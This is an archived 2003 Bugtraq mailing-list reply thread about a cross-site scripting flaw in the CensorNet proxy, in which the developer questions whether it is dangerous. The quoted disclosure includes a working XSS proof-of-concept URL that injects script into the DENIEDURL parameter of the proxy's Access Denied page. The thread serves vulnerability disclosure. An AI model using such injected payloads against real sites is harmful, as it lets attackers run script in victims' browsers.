[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: CensorNet: Cross Site Scripting Vulnerability

To: "Richard Maudsley" <maudr001@rbwm.org>, "David Wright" <wrigd006@rbwm.org>
Subject: Re: CensorNet: Cross Site Scripting Vulnerability
From: "Dan Searle" <dan.searle@adelix.com>
Date: Mon, 27 Oct 2003 09:18:58 -0000

Hi People,

I'm Dan the main developer for CensorNet. I don't consider this issue to be
a vulnerability of any kind, however, we will endeavour (for completeness)
to stop people from being able to insert script into the "Access Denied"
page on CensorNet. If anyone could enlighten me as to a situation where this
"vulnerability" would actually become dangerous in a practical situation
then please feel free.

Regards, Dan...

----- Original Message ----- 
From: "David Wright" <wrigd006@rbwm.org>
To: "Richard Maudsley" <maudr001@rbwm.org>
Cc: <bugtraq@securityfocus.com>; <support@adelix.com>; <frenw001@rbwm.org>
Sent: Saturday, October 25, 2003 4:47 PM
Subject: Re: CensorNet: Cross Site Scripting Vulnerability


> Richard.
>
> Sorry i havent replied. I have been ill towards the end of the week.
>
> If you get a response from Adelix (they have taken over Intrago) can you
> let us know.
>
> Regards
>
> Dave
> "Richard Maudsley" <maudr001@rbwm.org> writes:
> >Hello,
> >
> >A cross site scripting vulnerability exists in the CensorNet Proxy
Service
> >(www.censornet.com) that allows scripting (and html) to be passed to the
> >cgi script and displayed in the web browser.
> >
> >Exploit:
>
>http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-
Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.u
k")</script>
> >
> >Regards,
> > Richard Maudsley
>
>
> David Wright
>
> Royal Borough of Windsor and Maidenhead
> -WAMIE (FirstClass) Technical Support Co-ordinator
>
> The Windsor Boys' School
> -SIMS Manager
>
> 1 Maidenhead Road, Windsor, Berkshire, SL4 5EH
>
> E-Mail: wrigd006@rbwm.org
> Work: 01753 716083
> Fax: 01753 833186
> Mobile:
>
>
> - -------------------------------------------------------------------
>     This email has been sent from the Royal Borough of Windsor and
Maidenhead LEA system, if you have cause for complaint regarding the
>        content of this email please contact abuse@rbwm.org
> - -------------------------------------------------------------------
>

Follow-Ups:
- Re: CensorNet: Cross Site Scripting Vulnerability
  - From: "Richard Maudsley" <maudr001@rbwm.org>

References:
- CensorNet: Cross Site Scripting Vulnerability
  - From: "Richard Maudsley" <maudr001@rbwm.org>

Prev by Date: Norton Internet Security 2003 XSS
Next by Date: Les Visiteurs v2.0.1 code injection vulnerability
Previous by thread: CensorNet: Cross Site Scripting Vulnerability
Next by thread: Re: CensorNet: Cross Site Scripting Vulnerability
Index(es):
- Date
- Thread